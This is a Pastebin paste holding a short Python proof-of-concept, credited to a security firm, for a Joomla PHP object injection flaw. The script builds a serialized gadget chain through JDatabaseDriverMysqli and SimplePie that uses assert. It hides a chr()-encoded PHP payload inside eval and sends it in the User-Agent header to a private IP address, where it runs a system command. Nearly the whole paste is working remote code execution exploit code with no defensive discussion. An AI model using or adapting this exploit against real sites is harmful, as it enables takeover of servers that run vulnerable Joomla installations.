Guest User

Joomla PoC

a guest
Dec 15th, 2015
9,468
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '''
  2.    Simple PoC for Joomla Object Injection.
  3.    Gary @ Sec-1 ltd
  4.    http://www.sec-1.com/
  5. '''
  6.  
  7. import requests #  easy_install requests
  8.  
  9. def get_url(url, user_agent):
  10.  
  11.     headers = {
  12.     'User-Agent': user_agent
  13.     }
  14.     cookies = requests.get(url,headers=headers).cookies
  15.     for _ in range(3):
  16.         response = requests.get(url, headers=headers,cookies=cookies)    
  17.     return response
  18.    
  19. def php_str_noquotes(data):
  20.     "Convert string to chr(xx).chr(xx) for use in php"
  21.     encoded = ""
  22.     for char in data:
  23.         encoded += "chr({0}).".format(ord(char))
  24.  
  25.     return encoded[:-1]
  26.  
  27.  
  28. def generate_payload(php_payload):
  29.  
  30.     php_payload = "eval({0})".format(php_str_noquotes(php_payload))
  31.  
  32.     terminate = '\xf0\xfd\xfd\xfd';
  33.     exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  34.     injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
  35.     exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  36.     exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  37.  
  38.     return exploit_template
  39.  
  40.  
  41.  
  42. pl = generate_payload("system('touch /tmp/fx');")
  43.  
  44. print get_url("http://172.31.6.242/", pl)
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×